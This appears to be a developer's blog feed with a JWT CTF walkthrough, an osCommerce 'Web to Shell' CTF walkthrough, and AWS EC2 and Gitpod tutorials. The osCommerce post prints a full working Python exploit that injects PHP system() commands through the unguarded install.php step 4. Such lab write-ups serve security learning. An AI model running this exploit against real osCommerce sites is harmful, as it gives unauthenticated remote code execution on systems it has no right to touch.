DEV Community: Anudeep Reddy

CTF.live - Secret in Claim

Anudeep Reddy — Mon, 03 Aug 2020 14:46:10 +0000

This post is originally written in my personal blog Anudeep's blog

This post is a walkthrough of a lab from ctflive. You can find this lab here, First give it a try yourself before going through this post. It's a JWT based challenge. For those of you who don't know what a JWT is. don't worry there will be a short introduction about that in this post.

What is JWT🤔?

JSON Web Tokens are an open, industry standard RFC 7519 method for representing claims securely between two parties. (source: https://jwt.io). What does this even mean🤷‍♀️?.

Let us have a look at one of the best explanations i read so far and it's by Kasey Speakman. I am dropping his dev profile here, do drop a heart on his actual comment that is linked below.

.ltag__user__id__15366 .follow-action-button { background-color: #093656 !important; color: #ffffff !important; border-color: #093656 !important; }

Kasey Speakman

collector of ideas. no one of consequence.

Kasey Speakman

Sep 22 '17

This one is tough to explain LI5. Most physical analogies fall down. I attempted several already and threw them away. And things that are like JWT (like the chip in credit cards) have to be explained too. Hopefully somebody has a good analogy handy.

Edit: Actually I thought of one.

For background, in the US the legal age to consume alcohol is 21 years. Restaurants are required to verify your age is at least 21 before serving alcohol. They normally do this by checking your driver's license.

Scenario 1: (Not JWT)

I'm at a restaurant and I order a beer. This particular restaurant takes age verification very seriously. So the waiter asks to see my license. I provide it, but then he goes and gets a phone. He calls the DMV, waits on hold for a bit, and asks them to verify the license details. Once he talks to the licensing authority and they confirm my date of birth, then he goes and gets my beer.

This is the old style of authentication, where you present your session cookie. When the server receives the session ID from the cookie, it turns around and calls the session service (or queries a database or memory) to find out if your ID is still good, and additional information that might be stored in that session.

As you can see, this can become a bottleneck to service.

Scenario 2: (JWT)

I'm at a restaurant and I order a beer. This particular restaurant also takes age verification very seriously. The waiter asks to see my license, and I provide it. The waiter pulls out a UV light and inspects the watermark on my license. It checks out ok, so he hands the license back and gets my beer.

In this case, the issuing authority of the license placed a special "seal" into the license that can be used to identify valid licenses. This means that verification can be performed without calling back to the DMV. The waiter has to know exactly what seal to look for. That might mean he has to go look up the state's seal sometimes. Once the waiter determines that the license is valid, they can trust the Date of Birth information on it.

This is the JWT variety of authentication. Once the DMV believes you are who you say (JWT version: autheticated, probably with password), it collects various data about you (JWT version: claims) and puts it on the license (JWT itself). When the license is issued, it is also watermarked with a seal (JWT version: digital signature) so that it can be examined for validity by people who know what to look for (JWT version: your API validates the JWT signature with a shared key). After that, the license (JWT) is trusted and the Date of Birth (claim) is assumed to be true.

Let's get into the actual working now

A JWT is of the format xxxxxxxxx.yyyyyyyyyyy.zzzzzzzzzzzz.

x's specify the algorithm used to sign the JWT in base64.
y's contain the claims in base64.
z's are the signature that is generated with xxxxxxxxx.yyyyyyyyyyy as the data.

The Algorithms that are generally used to sign JWT includes:

HS256 (Symmetric)
RS256 (Asymmetric)

Where are these used?

As far as our lab is concerned, we use it to authenticate users to a website. So when a user logins to a website the website will issue a JWT with the claims of who the user is and any additional information. This JWT is sent back to the website in the subsequent requests made by the user. The JWT is first verified to check if the signature is legit, it's basically done by again signing the xxxxxxxxx.yyyyyyyyyyy of the token and checking if it matches with the signature that is sent as a part of the JWT. If they are equal then the server can trust the claims that come with the JWT. If any user tries to tamper with the claims in the JWT(the data in yyyyyyyyyyyy part) then the signature won't match and in an ideal condition the website should through an unauthorized message.

Now the Lab

Mission 💻

Retrieve the secret information present in the token payload!

We are given with a CMS to interact with. The Lab also gives you with the username and password to login to the user account.

Let's start

Starting the lab you will be given a virtual environment where the CMS is hosted in your local network and you have a machine with all the tools you will need preinstalled.

The challenge page also gives you few instruction on how to access the CMS that is hosted in your local environment.

It says the CMS runs on port 1337 and since I have already worked with a CMS that works on that port, I knew it was strapi already.

Now let us try to login with the credentials given. Strapi currently manages admin and end users separately. I assume that the credentials given to us are of the end user. So we can't access the strapi admin page with these credentials. All we need is the JWT because out flag is hidden these as the name of the challege suggests.

First we need to find the IP address on which the CMS is hosted. For that run ifconfig in your console to find your IP and then follow the instructions of the challenge to find the IP of the CMS.

In my case my IP was 192.142.236.2 and that of the CMS was 192.142.236.3. It is given in the challenge on what is the auth endpoint and the parameters that it accepts.

Let us use curl to send the request. I ran the following command to send a post request to the CMS and retrieve the JWT from the response.

Now copy that JWT from the console and head over to jwt.io which will decode the JWT for us.

Voila, there's our flag🎉.

Learning

Sometimes developers might end up sending critical information in the JWT. Make sure you check for such information during bug bounty or when you are building your own application.

CTF.live - Ecommerce: Web to Shell Walkthrough

Anudeep Reddy — Mon, 27 Jul 2020 14:18:52 +0000

This post is originally written in my personal blog Anudeep's blog

This post is a walkthrough of a lab from ctflive. As the name suggests it's a Web Application Lab. I have been in search of beginner level labs to get started and found ctf lab which has labs that are beginner friendly. So without wasting much of your time let's get started.

Please go through the entire post as i am going to breakdown the exploit that was used 👨‍💻.

Before reading this I would like you to give it a try yourself. Here is the link to the lab. Ecommerce: Web to Shell

Walkthrough

Once you start your lab and open it you should see a e-commerce site. Looking around you can observe that it's a php based website. First of all let us try to understand what we need to achieve.

Mission

The attacker might not have any user-level access to the web application. However, this does not mean that the application cannot be attacked remotely. Vulnerabilities could be triggered even by unauthenticated users.

In this challenge, the attacker is unauthenticated to the web application and needs to find and exploit the vulnerability.

Objective: Exploit the vulnerability and retrieve the flag.

This is the mission provided in the lab description. Let's try to understand what it means. The attacker might not have any user-level access to the web application, this statement clearly gives you a hint that you need not create a user account to exploit this lab. And if we look closely at the name of the lab Ecommerce: Web to Shell, does it ring any bells??.

If you guessed that you need to get a shell access then you are right🥳.

Let's start with some recon. I ran a nmap scan on the host to grab some info.

$> nmap -A <link-to-lab>

From the nmap results now we know that there are two open ports:

Port 22 running OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
Port 80 running Apache/2.4.7

Let us try to find if there are any vulnerabilities which might lead to RCE(Remote Code Execution) on Apache/2.4.7 as our ultimate goal is to get a shell access. For the vulnerability search let's dive into exploit-db and search for Apache/2.4.7. I found the following vulnerabilities.

The first one should be our point of interest as it's of type Remote Code Execution. But that exploit only works with Apache/2.4.7 in combination with php/7.0.2. Even our current application works on PHP but lets try to find out the version of PHP that our application is using, for that head over to <link-to-lab>/phpinfo.php which should give you a page similar to this.

Oops! It's not PHP/7.0.2 rather it's PHP/5.5.9, so our exploit won't work here.

Get back to basics

Now let's try out our recon phase again.
I started looking at the website at this point. Initially I thought osCommerce is the name of the store but then if you look at the footer of the website you will find something interesting, It says Powered by osCommerce. Now a quick Google search reveals that osCommerce is an e-commerce and online store-management software program. Now let us again dive back to exploit-db and search for vulnerabilities with osCommerce (Application level vulnerability) and you find this.

Let's try out the fourth vulnerability that is listed in the image above. The following exploit code is found along with the vulnerability.


import requests

# enter the the target url here, as well as the url to the install.php (Do NOT remove the ?step=4)
base_url = "http://localhost//oscommerce-2.3.4.1/catalog/"
target_url = "http://localhost/oscommerce-2.3.4.1/catalog/install/install.php?step=4"

data = {
    'DIR_FS_DOCUMENT_ROOT': './'
}

# the payload will be injected into the configuration file via this code
# '  define(\'DB_DATABASE\', \'' . trim($HTTP_POST_VARS['DB_DATABASE']) . '\');' . "\n" .
# so the format for the exploit will be: '); PAYLOAD; /*

payload = '\');'
payload += 'system("ls");'    # this is where you enter you PHP payload
payload += '/*'

data['DB_DATABASE'] = payload

# exploit it
r = requests.post(url=target_url, data=data)

if r.status_code == 200:
    print("[+] Successfully launched the exploit. Open the following URL to execute your code\n\n" + base_url + "install/includes/configure.php")
else:
    print("[-] Exploit did not execute as planned")

Now in the above exploit code I replaced the target url to the lab url and it should look like this.

import requests

# enter the the target url here, as well as the url to the install.php (Do NOT remove the ?step=4)
base_url = "http://l4eowcwhoggdly42685x49mzl.ctf-india.attackdefenselabs.com"
target_url = "http://l4eowcwhoggdly42685x49mzl.ctf-india.attackdefenselabs.com/install/install.php?step=4"

data = {
    'DIR_FS_DOCUMENT_ROOT': './'
}

# the payload will be injected into the configuration file via this code
# '  define(\'DB_DATABASE\', \'' . trim($HTTP_POST_VARS['DB_DATABASE']) . '\');' . "\n" .
# so the format for the exploit will be: '); PAYLOAD; /*

payload = '\');'
payload += 'system("ls");'    # this is where you enter you PHP payload
payload += '/*'

data['DB_DATABASE'] = payload

# exploit it
r = requests.post(url=target_url, data=data)

if r.status_code == 200:
    print("[+] Successfully launched the exploit. Open the following URL to execute your code\n\n" + base_url + "install/includes/configure.php")
else:
    print("[-] Exploit did not execute as planned")

Now let us run the exploit.

The output in the terminal says the exploit was successful, buts let's checkout if it actually works.

Opening the link that was printed on the console actually runs the ls command on the server. Now we have shell access to the application that allows us to perform RCE(Remote Code Execution). Now let us change the command from the exploit code and let us try to find the flag file on the server.

Try 1: cd to the root of the server and check if there are any interesting files or folders.

I have changed the payload to the following

payload += 'system("cd / && ls");'    # this is where you enter you PHP

Run the exploit again and check the output.

The app folder looks interesting. Change the payload in the exploit, list the files in the folder and you should find a flag file. print out the flag file to get your flag.

Our final payload looks like this.

payload += 'system("cat /app/flag*");'    # this is where you enter you PHP payload

There you go, your flag which is a md5 hash.

Bingo🎉, we just solved our first lab.

Let us try to understand what just happened

I you look back at the exploit code you will see that we are just sending a post request with a crafted payload. So I downloaded the source code of osCommerce(you can find it here) and the problem lies with the osCommerce installation process.

So the problem is osCommerce doesn't put a check on if the app is already installed, this will allow the attacker to access the installation process again and reconfigure the site without having any user level access. In the payload we are sending the post request to step 4 because in step 4 of the installation process we are asked to configure the database and rest of the information and is written to the install/includes/configure.php. And the major problem here is that the input provided by user is not sanitized, this allows attacker to send crafted input as we did in the exploit above which allows us to inject the system command into the configure.php file. So when you open the configure.php file from your browser the system command that was injected gets executed and thus we have remote shell access to the server. This marks the end of this lab.

Happy hacking 👨‍💻

What is the difference between an ODM and an ORM

Anudeep Reddy — Fri, 07 Feb 2020 10:15:00 +0000

Get started with AWS EC2

Anudeep Reddy — Thu, 26 Dec 2019 05:56:27 +0000

Amazon Web Services (AWS) is a secure cloud services platform, offering compute power, database storage, content delivery and other functionality.
The AWS Cloud spans 69 Availability Zones within 22 geographic regions around the world, with announced plans for 13 more Availability Zones and four more AWS Regions in Indonesia, Italy, South Africa, and Spain.
One of their services is Amazon Elastic Compute Cloud, which allows users to have at their disposal a virtual cluster of computers, available all the time, through the Internet.

This Post is all about the Amazon EC2 what is it?, Creating and accessing your own EC2 instance

What is EC2?

EC2 stands for Elastic Compute Cloud. It is a web service which allows people to run applications and workload on virtual machines in the AWS cloud.
Basically they are the virtual servers in the cloud which the users can access and deploy their applications to. The benefits of using Amazon EC2 include the following:

ELASTIC WEB-SCALE COMPUTING
COMPLETELY CONTROLLED
FLEXIBLE CLOUD HOSTING SERVICES
INTEGRATED
RELIABLE
SECURE
INEXPENSIVE
EASY TO START

Setting up a EC2 instance is pretty straight forward. You can choose an instance type and the operating systems from a wide variety of options available in the AWS console. The user is given control to setup the memory and network configuration. AWS charges users on hourly basis for EC2. The users can also assign a Elastic IP(Static IP) to their EC2 instance. If you want to setup a domain and need a DNS then AWS Route 53 is at your service.

Creating your own EC2 instance

If you are here then let me assume that you have already signed up to the AWS and added a Payment option. If you are haven't done any of that yet then go ahead and do it now.

Sign in to your AWS console. Head over to this link to sign in https://aws.amazon.com/
Your console should look something like this.

Now click on the services in the top navigation bar and then click on EC2 that is under compute section to navigate to the EC2 dashboard.
Now in the EC2 dashboard you will see a button called Launch Instance click on that to start setting up your instance.
In the first step you will be asked to Choose an Amazon Machine Image(AMI). AMI is basically the operating system that you want to run in your EC2 instance. Few images are free to use where as there are few images for which we need to pay additional licensing fees.

We will be choosing Ubuntu Server 18.04 LTS (HVM), SSD Volume Type for this tutorial. Feel free to choose your own.
In the next step you will be asked to choose an Instance type, Amazon EC2 provides a wide selection of instance types optimized to fit different use cases. Instances are virtual servers that can run applications. They have varying combinations of CPU, memory, storage, and networking capacity, and give you the flexibility to choose the appropriate mix of resources for your applications.

You can now just Review the settings and Launch the instance directly or Configure other instance details, Add aditional storage and also configure the security group.
We will just leave the other details unchanged and head over to the 6th step to configure the security group.
This section allows you to configure the firewall rules that control the traffic to our instance.
By Default the instance allows traffic on port 22 for establishing a SSH connection to the Server.
Now let us configure it to allow http traffic on port 80.
Click on Add Rule and populate the type field to HTTP and all the other fields are automatically filled.

Now click on Review and Launch button at the bottom. Now you will see the entire configuration for your instance. If everything looks good then click on launch.
Once you click on launch you will be asked to create or use a existing Public key and Private key pair. Create a new key pair, Give the key pair a name and once you download the key click on Launch. This key will be used to authenticate us to the EC2 instance via SSH.

Accessing your EC2 Instance

Once you are done with creating your EC2 instance then you will be redirected to a page where you can access all your running instances.

Select the instance that you want to connect to, Once you have done that the connect button will be enabled. Clicking on the button will give you instructions to connect to your instance.
Open up a terminal and navigate to the location where you stored your key that you downloaded during the creation process.
For me it's Downloads. If you are on windows machine then fire up bash or terminal in linux and OSX.
Give your key the right permissions by typing this command: sudo chmod 400 [PATH/TO/THE/KEY]

Once you are done doing that Copy down the example command shown in the EC2 dashboard and run it in your terminal.
That's it you are now connected.

Setting up a apache webserver

As you are connected to the machine via SSH, You now have a terminal access to the virtual machine and you can run commands to perform operations on it.

We have already allowed traffic on port 80, so now we can access our website if we host one on this virtual machine. To setup a simple webserver let us install apache.

sudo apt-get update
sudo apt-get install apache2 -y

Now type the following command to start the apache server.

sudo service apache2 start

Now open your web browser and navigate to the IP assigned to your EC2 instance. You should be able to see the following page.

We have successfully installed apache now.
If you want to host your own website then modify the files located at /var/www/html. That directory contains the files of your website.

Assigning an Elastic IP

The IP address that is currently assigned to the Instance will be lost if you reboot the instance. So if you want your instance to have a static IP then AWS offers something called Elastic IP. You can assign a static IP to the instance using Elastic IP.

Follow these steps to assign a Elastic IP:

In the sidebar of the EC2 instance dashboard you will find Elastic IP under Network and security.
Click on allocate elastic IP.
Once that's done. Select the IP and click on actions and click on Associate Elastic IP address.
In the next page select the Instance to which you want to assign that IP to.
Click on Associate and you are done. The Elastic IP is associated to your instance.

NOTE: The Elastic IP is a chargable service.
Check out the pricing in the AWS pricing page

Final Thoughts

AWS EC2 is an easy way to get started with cloud computing as a beginner. AWS also provides one year free tier services if you setup your payment information. With the AWS free tier you can access all the basic services provided as a part of AWS for free. Claim your free one year now by signing up and providing your payment info.
Navigate to this page to know more https://aws.amazon.com/free/?all-free-tier.sort-by=item.additionalFields.SortRank&all-free-tier.sort-order=asc

Thank you!

Feel free to leave your comments below

Easy drag and drop tools to build your frontend

Anudeep Reddy — Fri, 25 Oct 2019 12:21:59 +0000

I have been searching for drag and drop tools to build my frontend for the nodejs backend i write. Ended up finding bootstrap studio. Do you guys have any better alternatives?

Build a Webhook for Google Assistant Action

Anudeep Reddy — Wed, 26 Jun 2019 12:34:35 +0000

This post is all about how to build your webhook for your Google Assistant action and host it temporarily on Gitpod and test your code.

Prerequisites

Node JS
Express JS
Basics on how to use Github

If you have these in place, Let's get started.

What is Gitpod?

First of all I would like to start this section by saying, I ❤ Gitpod. Gitpod is an online IDE for Github. Gitpod provides you with a fully working development environment, including a VS Code-powered IDE and a cloud-based Linux container configured specifically for the project at hand. Just prefix your Github repo URL with "https://gitpod.io/#", So that the final link looks something like this "https://gitpod.io/#https://github.com//" or you can also use the Gitpod browser extenstion to add the Gitpod button to Github page.

Let's start building

I have created a Github repo which will help you get started without any hassle. The repo is basically a boilerplate to get started with building your webhook. The code is written in Node JS, So it would be easier for you to build on top of it if you are already familiar with Node JS. We will be using the action-on-google Node JS library (This client library makes it easy to create Actions for the Google Assistant and supports Dialogflow, Actions SDK, and Smart Home fulfillment.).

Create your Action

Head over to https://console.actions.google.com/ and click on New Project.

Enter your project name and click on create project.

Now select a category for your Action.
Now under the Develop menu, give your action a name.
Now head over to actions menu in Develop tab and click on Add your first action.

In the next section choose custom intent and click on build. Doing this will redirect you to the Dialogflow console and it should look something like this.

Click on create to create your agent on Dialogflow.
Once your agent is ready, you will already have two default Intents (Default Fallback Intent and Default Welcome Intent) in place and these two do pretty good at their job.
Now it's time to create a new intent and enable fulfillments for that intent so that we can serve responses from the webhook that we will be building in the next section.
Click on create a new intent, give it a name and training phrase (training phrase will be used to invoke the intent). Now that your intent is almost ready scroll down and under fulfillments enable webhook call for the new Default welcome intent and the new intent you just created.

Understanding .gitpod.yml

The .gitpod.yml file is used to automate setting up the environment required to run your app.

If you want to access services running in your workspace, e.g. a development HTTP server on port 8080, you need to expose that port first. Gitpod has two means of doing that:

On-the-fly: when you start a process which listens on a port in your workspace, Gitpod will ask you if you want to expose that port to the internet.
In your configuration: if you already know that you want a particular port exposed, you can configure it in the .gitpod.yml file and skip the extra click later on. For example:

ports:
  - port: 3000

When starting or restarting a workspace you typically want to run certain tasks. Most probably that includes the build and maybe also running tests and automatically start the application in e.g. a dev server.

Gitpod allows you to configure start tasks in the .gitpod.yml file.

For instance, the start script for this repository is defined as:

tasks:
- init: npm install
  command: npm start

You can have multiple tasks, which are opened on separated terminals.

tasks:
- init: npm install
  command: npm start
- command: echo -e "\n\nwebhook url - $(gp url 3000)/webhook \n\nCopy and paste this url in the Dialogflow console"

`init` command

The init property can be used to specify shell commands that should only be executed after a workspace was freshly cloned and needs to be initialized somehow. Such tasks are usually builds or downloading dependencies. Anything you only want to do once but not when you restart a workspace or start a snapshot.

In our case the init command is

tasks:
- init: npm install

Get the Gitpod setup running

Fork my repo (dialogflow-webhook-boilerplate-nodejs) or just click on the run in gitpod button in my repo. (If you do this you have to fork it from the workspace so that you can commit your own changes to your repo).
Now you can just prefix your repo url with "https://gitpod.io/#". This should take you to Gitpod and start your workspace. The workspace take a little while to start.
Once the workspace is running you should see something like this.

If you notice the Node app is already running in the first terminal. This is automated by a Gitpod configuration file. And the webhook URL is printed on to the second terminal. All the dependencies that are required are also installed while creating the workspace.

Now that the webhook is running and i presume that you already have your agent on Dialogflow (If not create an agent), Next thing you need to do is to copy the webhook URL from the terminal and paste it in the Fulfillments section in the Dialogflow Console.

Open the index.js file which contains the code for the webhook.

The file initially contains this code. Now lets add some more code to it to display a card when we invoke the new intent we created in the previous section.
actions-on-google library provides many functionalities to can simplify your task to render rich responses in your action.

We will be adding the following code to display a card when the new intent is invoked.

Replace the URL's and other contents in the code and stop the previous instance of the app from running and start it again after you have made changes to the code by running npm start in the terminal.

To test your action you can click on See how it works in Google Assistant in the Dialogflow console.

Invoking the intent would give you response similar to this.

Refer to the links below to add your own functionalities.

Links to Refer

If you would like to learn more about the actions-on-google library, you can find it here - https://www.npmjs.com/package/actions-on-google
Go through these examples - https://developers.google.com/actions/samples/github
Rich responses example - https://github.com/actions-on-google/dialogflow-conversation-components-nodejs

Conclusion

Gitpod can make your life much simpler by automating your development setup just by adding a simple configuration file to your repo. You can refer to the Gitpod Docs to learn more about the platform. Gitpod lets you work with unlimited workspace but with 100hrs/month runtime. It also provides Personal and unlimited plans as well. If you are a student then you can claim Gitpod Unlimited plan for just $9.

Happy coding with Gitpod ✨

DEV Community: Anudeep Reddy

CTF.live - Secret in Claim

What is JWT🤔?

Kasey Speakman

Let's get into the actual working now

Where are these used?

Now the Lab

Mission 💻

Let's start

Voila, there's our flag🎉.

Learning

CTF.live - Ecommerce: Web to Shell Walkthrough

Walkthrough

Mission

Get back to basics

Bingo🎉, we just solved our first lab.

Let us try to understand what just happened

Happy hacking 👨‍💻

What is the difference between an ODM and an ORM

Get started with AWS EC2

What is EC2?

Creating your own EC2 instance

Accessing your EC2 Instance

Setting up a apache webserver

Assigning an Elastic IP

Final Thoughts

Feel free to leave your comments below

Easy drag and drop tools to build your frontend

Build a Webhook for Google Assistant Action

Prerequisites

What is Gitpod?

Let's start building

Create your Action

Understanding .gitpod.yml

init command

Get the Gitpod setup running

Links to Refer

Conclusion

Happy coding with Gitpod ✨

`init` command